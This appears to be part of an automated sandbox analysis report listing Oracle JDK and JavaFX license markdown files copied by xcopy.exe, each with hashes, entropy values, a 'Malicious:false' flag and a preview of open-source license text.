                                                                                                                                                                                                                                  SHA-256:134934EB2B2BC3F1B0781402211B5CDBD5915296F2BFF3A100C9CC47C8A9ED75
                                                                                                                                                                                                                                  SHA-512:E25DF71D4A30921658C19C625F5DCC60501DDE115F6B2032B9A2B87761AD27AB0BAEBCA58AED178E7E34B9BAF3C8050DEAED4C79E39BFBCC0D196695E64E3CE5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## IBM International Components for Unicode (ICU4C) v71.1..### ICU License.```.COPYRIGHT AND PERMISSION NOTICE..Copyright . 1991-2022 Unicode, Inc. All rights reserved..Distributed under the Terms of Use in https://www.unicode.org/copyright.html...Permission is hereby granted, free of charge, to any person obtaining.a copy of the Unicode data files and any associated documentation.(the "Data Files") or Unicode software and any associated documentation.(the "Software") to deal in the Data Files or Software.without restriction, including without limitation the rights to use,.copy, modify, merge, publish, distribute, and/or sell copies of.the Data Files or Software, and to permit persons to whom the Data Files.or Software are furnished to do so, provided that either.(a) this copyright and permission notice appear with all copies.of the Data Files or Software, or.(b) this copyright and permission notice appear in associated.Documentation...THE DATA FILES AND SOFTWARE ARE PROVIDED "AS IS",

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\jpeg_fx.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2158
                                                                                                                                                                                                                                  Entropy (8bit):4.774228773676062
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:jbCJPkN1OgR+5bwcWFWV52sRZeSLNCAN1gQ3GbQ:g8PWf5ZoAzgM
                                                                                                                                                                                                                                  MD5:A56ACB008440B8DEC7B35F8862EEFC16
                                                                                                                                                                                                                                  SHA1:224055765EA328090334C8DE25ED8F3360B70111
                                                                                                                                                                                                                                  SHA-256:A7BB58D9ED7F118480AAAD20C318D1E5D4693BA6A4DB5101903065EC5552C8B5
                                                                                                                                                                                                                                  SHA-512:300498C400AA5B2541597319985F887475BF22847260BB1F852EA487B0F488DE90EFBBE2CBE24E5C6C9362FABB00B41BC056100EBD3AB1D7F132A2EF619CA386
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Independent JPEG Group (IJG) JPEG v9e..### IJG License.```../*. * jcapimin.c. *. * Copyright (C) 1994-1998, Thomas G. Lane.. * Modified 2003-2010 by Guido Vollbeding.. * This file is part of the Independent JPEG Group's software.. * For conditions of distribution and use, see the accompanying README file.. */..[From the README file].The authors make NO WARRANTY or representation, either express or implied,.with respect to this software, its quality, accuracy, merchantability, or.fitness for a particular purpose. This software is provided "AS IS", and you,.its user, assume the entire risk as to its quality and accuracy...This software is copyright (C) 1991-2022, Thomas G. Lane, Guido Vollbeding..All Rights Reserved except as specified below...Permission is hereby granted to use, copy, modify, and distribute this.software (or portions thereof) for any purpose, without fee, subject to these.conditions:.(1) If any part of the source code for this software is distributed, then this.READ

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\libffi.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1179
                                                                                                                                                                                                                                  Entropy (8bit):5.180116500742468
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jPmDXiJHTHuyPP3GtIHw1Gg9WPH+sUW8Ok4odZo3U/qldFJ:aTiJTfPvGt7ICWPH+sfINi3OMFJ
                                                                                                                                                                                                                                  MD5:5F24C521BC250FAA4F21B70203E18238
                                                                                                                                                                                                                                  SHA1:F4AFA0EDFFD91B401245E3BC3E5DF4BE61F4B822
                                                                                                                                                                                                                                  SHA-256:D08FC59B499CB1AF49DC5F8274BDE07FD87D39D218A634128566C862AC5BA00D
                                                                                                                                                                                                                                  SHA-512:94BC9F3D8521086C239615712A97960FBFEF8FDCF7C8B3C80186FEE1B5612B25D6D54832EC3147A86323524B86E24E5551C6E1B73F5F0D3E7275E8271427068D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## LibFFI v3.4.2..### LibFFI License.```..libffi - Copyright (c) 1996-2021 Anthony Green, Red Hat, Inc and others..See source files for details...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.``Software''), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES O

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\libxml2.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3452
                                                                                                                                                                                                                                  Entropy (8bit):5.242335375516898
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:EYNXESJrlxEvdQHOs5exm3ogFQ4Dn1XntONJbbvE/5QHOs5exm3oEFnyoXaoyoda:EYNXLu1QHToMzNtqshQHTo/oK5odR2jN
                                                                                                                                                                                                                                  MD5:D4A7A2358B5DCEB54BBE8657AD2264B3
                                                                                                                                                                                                                                  SHA1:D142A52D97707733ED3AAF8B4CDB4FED3175A7F3
                                                                                                                                                                                                                                  SHA-256:7412900159A82D5CEBCDF56FE8350AB4607A77B20207579E8097D33D6542BA74
                                                                                                                                                                                                                                  SHA-512:DFEE10325ECC676CB16B592AF4CB67CC0D1AA47EA75D3C4E9B53A7330A9AD8B58CCF9A72A10395F69B772323930722144D9EF8FFB565E3C63C90C9E792C85C26
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## xmlsoft.org: libxml2 v2.10.4..### libxml2 License.```..Except where otherwise noted in the source code (e.g. the files hash.c,.list.c and the trio files, which are covered by a similar licence but.with different Copyright notices) all the files are:..Copyright (C) 1998-2012 Daniel Veillard. All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WAR

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\libxslt.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3031
                                                                                                                                                                                                                                  Entropy (8bit):5.057359446779112
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:qaJHlxEs5QHOs5NjaVFIryFwfaJHlxEs5QHOs5NzraVFIrJBFwW:1u8QHGQr2u8QH72QrJ3
                                                                                                                                                                                                                                  MD5:97A91381527B2065626BC55FCA2E48DF
                                                                                                                                                                                                                                  SHA1:92A4E828C53F4EDE3FCFD44BC461A1CC8CC8A2A0
                                                                                                                                                                                                                                  SHA-256:E75078AADC6AFFF34F1FF327A808BCEEAB3F91B1C717728E4E4DE865052F282B
                                                                                                                                                                                                                                  SHA-512:9619CEE7F687BF00523A685E1A29030C516A25DA61413BBDC46D45171F51E1DB4AB9F475853FECFBC95758199A53591E149AB3DF497652A4FA4C21303C0CD732
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## xmlsoft.org: libxslt v1.1.35..### libxslt License.```..Licence for libxslt except libexslt.----------------------------------------------------------------------. Copyright (C) 2001-2002 Daniel Veillard. All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is fur-.nished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FIT-.NESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. I

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\mesa3d.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5732
                                                                                                                                                                                                                                  Entropy (8bit):5.1453426112774965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:tqsVQHfoGKlxESLI1GXVsCGQHlzQUGP+0nWeHGT+weUGP+0nWeHGT+wI:pQHfh4hE1GX1GQH9pqnWeHGySqnWeHGK
                                                                                                                                                                                                                                  MD5:C7E0D19C8F4EFF11E97F0EB9AFD3F7F4
                                                                                                                                                                                                                                  SHA1:6A98EE2703132E181F37D162452F073FB64CED83
                                                                                                                                                                                                                                  SHA-256:63F4E6F75CAEBBCCB95D903FB43E46AC7111B3624D0A34F146B276D7D9E7B152
                                                                                                                                                                                                                                  SHA-512:9C4111728AB9472F0B160CB11CE1E4EBD75A83CFDDCA0B3CB87243D15AFC5A7FA34DC6006E6B92084648CBAD1426F70B405259F589CDEF758442643E1618DFF4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Mesa 3-D Graphics Library v21.0.3..### Mesa License..```.Copyright (C) 1999-2007 Brian Paul All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\public_suffix.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17785
                                                                                                                                                                                                                                  Entropy (8bit):4.591906517978096
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:gn7Ga28R/9yoeF6cXpMPWeXlUl5omyzQdBGYVSleCqxi:gn7GNw/woj25kzQdBG4CqI
                                                                                                                                                                                                                                  MD5:A90527D48AD0216FD1E5241015BB0F77
                                                                                                                                                                                                                                  SHA1:A59B3BF9478184BE7AE959E27CE7257BC418985A
                                                                                                                                                                                                                                  SHA-256:BCA182053946267C1F3BB5D160849A6A290B2AEFC57ABC7155180CA98DB87301
                                                                                                                                                                                                                                  SHA-512:6FE7F9980D1E29A0AB7CCCF8ACB1B73C867E48A975799F57E07381A432B5EAD70B2F470649AA36E38B6BFBF3E819FA2D2B9C4E3281C86ECF500549B1B4800038
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Mozilla Public Suffix List..### Public Suffix Notice.```.You are receiving a copy of the Mozilla Public Suffix List in the following.file: <java-home>/lib/security/public_suffix_list.dat. The terms of the.Oracle license do NOT apply to this file; it is licensed under the.Mozilla Public License 2.0, separately from the Oracle programs you receive..If you do not wish to use the Public Suffix List, you may remove the.<java-home>/lib/security/public_suffix_list.dat file...The Source Code of this file is available under the.Mozilla Public License, v. 2.0 and is located at.https://raw.githubusercontent.com/publicsuffix/list/3c213aab32b3c014f171b1673d4ce9b5cd72bf1c/public_suffix_list.dat..If a copy of the MPL was not distributed with this file, you can obtain one.at https://mozilla.org/MPL/2.0/...Software distributed under the License is distributed on an "AS IS" basis,.WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License.for the specific language governing rights and l

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\webkit.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):327799
                                                                                                                                                                                                                                  Entropy (8bit):5.302782566988643
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:Q7qN2p++So0PagIpXvMfyxz7GAB569x+JQMd4n:SLp+zo0PagIpXEfyxz7GABux+JQMd4n
                                                                                                                                                                                                                                  MD5:CCB4B77314198731E731BE17E9A266E9
                                                                                                                                                                                                                                  SHA1:E5E9369D8B6BBF5F16684B3E1CC7F65843D8CA01
                                                                                                                                                                                                                                  SHA-256:7EF4C770E4B6C7FD3CC75B02C8326D3E7E7C4036E90E6EAD3E32DB3BEA26DE5B
                                                                                                                                                                                                                                  SHA-512:EEA1CC2330280076498BFB7D0EFF815BD6B60E933197D7132BD70E4A6923C47FC91299F7C08D07226CE381247064537D787CF93D2B0ABF391D19CF7CCAFA208F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## WebKit Open Source Project: WebKit v615.1..### WebKit Notice.```..You are receiving a copy of WebKit in either source or.object code in the JavaFX runtime or JavaFX SDK. The terms of the.Oracle license do NOT apply to WebKit; it is.licensed under the following license, separately from the Oracle programs.you receive. If you do not wish to install this library, you may delete.this library:.. - On 32-bit Linux systems: delete $(JAVA_HOME)/lib/i386/libjfxwebkit.so. - On 64-bit Linux systems: delete $(JAVA_HOME)/lib/amd64/libjfxwebkit.so. - On Mac OS X systems: delete $(JAVA_HOME)/lib/libjfxwebkit.dylib. - On Windows systems: delete $(JAVA_HOME)\bin\jfxwebkit.dll..A copy of the Oracle modified WebKit library source code is located.in the following OpenJDK git repository:.. https://github.com/openjdk/jfx..You can use git to clone the repository or you can browse the.source using a web browser. The root directory of the WebKit source.code is here:.. rt/modules/javafx.web/src/m

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\asm.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1580
                                                                                                                                                                                                                                  Entropy (8bit):5.1976303403500985
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:t5OorYJCrYJ5zO432sHj32sZEtY17wNHN:yorYJCrYJZF3X31ENt
                                                                                                                                                                                                                                  MD5:C82EEECA7FED16EBBE4BD8C4B2DCB476
                                                                                                                                                                                                                                  SHA1:303A33D78C0B836681E2DD01313084DAE2208F5C
                                                                                                                                                                                                                                  SHA-256:862D6CAAA90ED0D85CD0E685118EBBF6E81976DF48E62FBB81236B743EA7B8AB
                                                                                                                                                                                                                                  SHA-512:5EE3B0DFA02F3865FC743B083F53D8AC756BF3CAD80FAFE69AA546D82539D6B0ACB92F01A1630F9C24FC71453619DF5063F459E828447688750EDB609EDD4184
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## ASM Bytecode Manipulation Framework v5.0.3 ..### ASM License.```..Copyright (c) 2000-2011 France T.l.com.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:..1. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...3. Neither the name of the copyright holders nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS".AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE.IMPLIED WARRANTIES OF MERCHANT

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\bcel.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                  Entropy (8bit):4.5608226065256705
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:FNVEASdeYFPVRQUM9o1XDFMKdFSvJZN+0G04Hrc3Pv8KIHKxF9Nmu3Dzt1XkTYsr:/CxNRrM21TiA+8VL+EKdXNt9xkTYE39
                                                                                                                                                                                                                                  MD5:12356A0E939F990DE52169117F3A8CC0
                                                                                                                                                                                                                                  SHA1:B22A25F5934882C3C2DFB84BF3BDC0B63D569016
                                                                                                                                                                                                                                  SHA-256:F1F41CD8F691DE74A288E5669D1B6600EC609FCD9B12E8A540BD5E3B3FB9554E
                                                                                                                                                                                                                                  SHA-512:C32EBEAB418222053E27AEF35F66AEA3B2DFEFA4BD8F0D6C4A0046973C1CF033A63C06EEF50072E33B4A9E6B44339584F057EB4B0EE93A3CDF92CD4C3950DBAC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Apache Commons Byte Code Engineering Library (BCEL) Version 6.7.0..### Apache Commons BCEL Notice.```.. Apache Commons BCEL. Copyright 2004-2022 The Apache Software Foundation.. This product includes software developed at. The Apache Software Foundation (https://www.apache.org/)...```..### Apache 2.0 License.```.. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/..TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION..1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For t

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\cldr.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3182
                                                                                                                                                                                                                                  Entropy (8bit):5.162739260656451
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:D9n5sAzLUTluwOH+5Pik3PvhtKVtw/iNKHKsfIQB0r0qDF3BrSFD5wvN:Z5sTluwjZxP5mqFHJB+lpBrYg
                                                                                                                                                                                                                                  MD5:ED19B9BEB7D30C00FBA258C27DA06E5E
                                                                                                                                                                                                                                  SHA1:1003665D1B3B1C0AEEEC8297F6810988F242F1D1
                                                                                                                                                                                                                                  SHA-256:8B59040A8BA6C3711CF1E3078DF798E7D7FA85377C7A9911703DB02FE1D6525F
                                                                                                                                                                                                                                  SHA-512:5DC562F74A91D87C8C7366688F1AFD0F449293E9101858C683075CBF3C79B442EF893551A71C520D1EBBE2E231112BC635FF8CEBBAB40E637A32869A5DCF5CDB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Unicode Common Local Data Repository (CLDR) v21.0.1 ..### CLDR License..```..UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE..Unicode Data Files include all data files under the directories.http://www.unicode.org/Public/, http://www.unicode.org/reports/, and.http://www.unicode.org/cldr/data/. Unicode Data Files do not include PDF.online code charts under the directory http://www.unicode.org/Public/..Software includes any source code published in the Unicode Standard or under.the directories http://www.unicode.org/Public/,.http://www.unicode.org/reports/, and http://www.unicode.org/cldr/data/...NOTICE TO USER: Carefully read the following legal agreement. BY DOWNLOADING,.INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S DATA FILES ("DATA.FILES"), AND/OR SOFTWARE ("SOFTWARE"), YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO.BE BOUND BY, ALL OF THE TERMS AND CONDITIONS OF THIS AGREEMENT. IF YOU DO NOT.AGREE, DO NOT DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE THE DATA FILES OR.SOFTW

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\colorimaging.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                                                                  Entropy (8bit):4.610377797901174
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:RFRELUacKIVVPDwwP1FZenv+PELUaRHdFFv7cOczDP8LUacKIVG9VY3:jxKIVbZAT/v9cvLKIVG8
                                                                                                                                                                                                                                  MD5:F1BA49FADB244E70F7D79F5121FCF56F
                                                                                                                                                                                                                                  SHA1:0D5706CB3C0BD0A7C036CD03E4751D132A0E4074
                                                                                                                                                                                                                                  SHA-256:2C102F5CA80236BE62E9A495E452D97B57F3B3353705DED10E5736A7AF940F67
                                                                                                                                                                                                                                  SHA-512:250A39516CA1BC418FA7A85035912481EF13E66ECBE01BED3BDC47C7BB77290CDA833A0A05401BA671A59DF0C8E58CCD2A3A08BBA632CEA745C69CFACE7CA652
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Eastman Kodak Company: Portions of color management and imaging software..### Eastman Kodak Notice.```.Portions Copyright Eastman Kodak Company 1991-2003.```..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\cryptix.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1415
                                                                                                                                                                                                                                  Entropy (8bit):5.179912770731788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:j6omjxUno8PbOIFThJyprYFTcQLey9Rwq32stOkg9SQROd32sZyxtT41BtGW+Zq8:mhjuTOIJarYJt7Cq32srX32sZEt01BtO
                                                                                                                                                                                                                                  MD5:6C5C5A8FEF2914E5E09FB918B6D89EFB
                                                                                                                                                                                                                                  SHA1:7F9C85AC9D5A2B534D427BB6CA3F7E1C28B86E99
                                                                                                                                                                                                                                  SHA-256:9B21963C3F1FF7A63F2D76CEDB65271D3302646D5B1BEC2F2CC058F2F10C54DE
                                                                                                                                                                                                                                  SHA-512:D4E21AB2BAD8DF19ACD966E222F58BAB8C4627CB077D14366DC856FCBE70678DC79C2F0BC31DB771F91BE0A8701D3D40B8C0558660B88F73B26ADDCE40F35738
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Cryptix AES v3.2.0..### Cryptix General License.```..Copyright (c) 1995-2005 The Cryptix Foundation Limited..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.. 1. Redistributions of source code must retain the copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in. the documentation and/or other materials provided with the. distribution...THIS SOFTWARE IS PROVIDED BY THE CRYPTIX FOUNDATION LIMITED AND.CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,.INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED..IN NO EVENT SHALL THE CRYPTIX FOUNDATION LIMITED OR CONTRIBUTORS BE.LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPE

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\dom.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3756
                                                                                                                                                                                                                                  Entropy (8bit):5.036615782726521
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Ve/ylyTd5/pe/aR6WEebVkoFxqbvyY5rpErRz+ulK0ZSw1bQknlZFQbV:Veamn/C4FrxWfyrgulK7hkl2V
                                                                                                                                                                                                                                  MD5:1E47B62A498E539A4A75377EE34AE5E4
                                                                                                                                                                                                                                  SHA1:62EEFBF6EB42A22614ACA424298CBCF5B797051B
                                                                                                                                                                                                                                  SHA-256:6AFA32B134D5B9F259D397137283B3BA0678E030FC1375AA3DA32FF4FB5899BD
                                                                                                                                                                                                                                  SHA-512:E2F6350C2781BC35BA7B2C53361B31FF1DD2FBEA260BB4A91A68D2F2D3FA9C1983D87C70F62EFEA58FF3C369A84B39BFB74489C31A420AE08032913CB12A79B7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## DOM Level 3 Core Specification v1.0..### W3C Software Notice.<pre>.Copyright . 2004 World Wide Web Consortium, (Massachusetts Institute of Technology,.European Research Consortium for Informatics and Mathematics, Keio University)..All Rights Reserved...The DOM bindings are published under the W3C Software Copyright Notice and License..The software license requires "Notice of any changes or modifications to the W3C.files, including the date changes were made." Consequently, modified versions of.the DOM bindings must document that they do not conform to the W3C standard; in the.case of the IDL definitions, the pragma prefix can no longer be 'w3c.org'; in the.case of the Java language binding, the package names can no longer be in the.'org.w3c' package..</pre>..### W3C License.```..W3C SOFTWARE NOTICE AND LICENSE..http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231..This work (and included software, documentation such as READMEs, or other.related items) is being provid

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\jdk\dynalink.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1497
                                                                                                                                                                                                                                  Entropy (8bit):5.192704122810525
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:j9TAAUUnoU+bOInrYFTY+JynrYFTtssxBJJ9i432sEEAkuyROd32sZyxtT41BtmJ:8OYrYJKrYJmozi432sVK32sZEt01BtE7
                                                                                                                                                                                                                                  MD5:1D40CC2D0EEAED836A3D0B8154C3D657
                                                                                                                                                                                                                                  SHA1:7E5CB50C5A1DACA603061E00D38193D1C50B72AF
                                                                                                                                                                                                                                  SHA-256:754A50E07CF9E0129D4875BB5A2E10FC7628CC82E3816C102EE1966165F5FFC3
                                                                                                                                                                                                                                  SHA-512:DF00F602FF05D5A5FE71449DB703F9F851546E40AE5CE85B79821939ACA35387CF97226DCFEF75B942522E93C3762642ACB9105ACD17AB35A3CEE6E8C2752492
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Dynalink v.5..### Dynalink License.```..Copyright (c) 2009-2013, Attila Szegedi..Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.* Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer..* Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution..* Neither the name of the copyright holder nor the names of. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS.IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED.TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A.PARTICULAR PURPOSE ARE DISCLAIMED. IN

